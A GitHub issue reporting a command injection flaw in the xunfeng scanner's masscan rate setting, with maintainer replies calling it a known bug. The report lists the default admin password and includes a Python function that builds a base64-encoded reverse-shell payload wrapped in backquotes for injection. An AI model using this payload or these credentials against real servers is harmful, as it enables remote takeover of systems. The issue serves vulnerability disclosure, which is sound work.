Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Found command injection vulnerability #176

Closed
gsfish opened this issue Sep 11, 2018 · 2 comments
Closed

Found command injection vulnerability #176

gsfish opened this issue Sep 11, 2018 · 2 comments

Comments

@gsfish
Copy link
Contributor

gsfish commented Sep 11, 2018

An attacker can execute arbitrary commands on the xunfeng server after login, the default account is admin:xunfeng321.

Use the following python function the generate the payload for bouncing a command shell, paste it to 配置 > 爬虫引擎 > 启用MASSCAN > 速率 and set scan mode to 1 (change 资产探测周期 may shorten the waiting time).

def get_payload(ip, port):
    getshell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{0}",{1}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'.format(ip, port)
    getshell = base64.b64encode(getshell.encode('utf-8')).decode('utf-8')
    payload = 'python -c \'exec __import__("base64").b64decode("{0}")\''.format(getshell)
    payload = '2000`{0}`0'.format(payload)
    return payload

The reason for the vulnerability is in nascan/plugin/masscan.py line 9 & 10, which miss to translate the backquote symbol `.

Demo: https://asciinema.org/a/YMUpLsKMHHUSOG9hrTCrFNo9p

@neargle
Copy link
Member

neargle commented Sep 11, 2018

Nice demo and exploit.
But it is one of our longstanding bugs. Look at #175 and #134, and see the words by ywolf who is main collaborator of XUNFENG.

@gsfish
Copy link
Contributor Author

gsfish commented Sep 11, 2018

Maybe it wouldn't be a bug combined with CSRF #177

This was referenced Sep 11, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants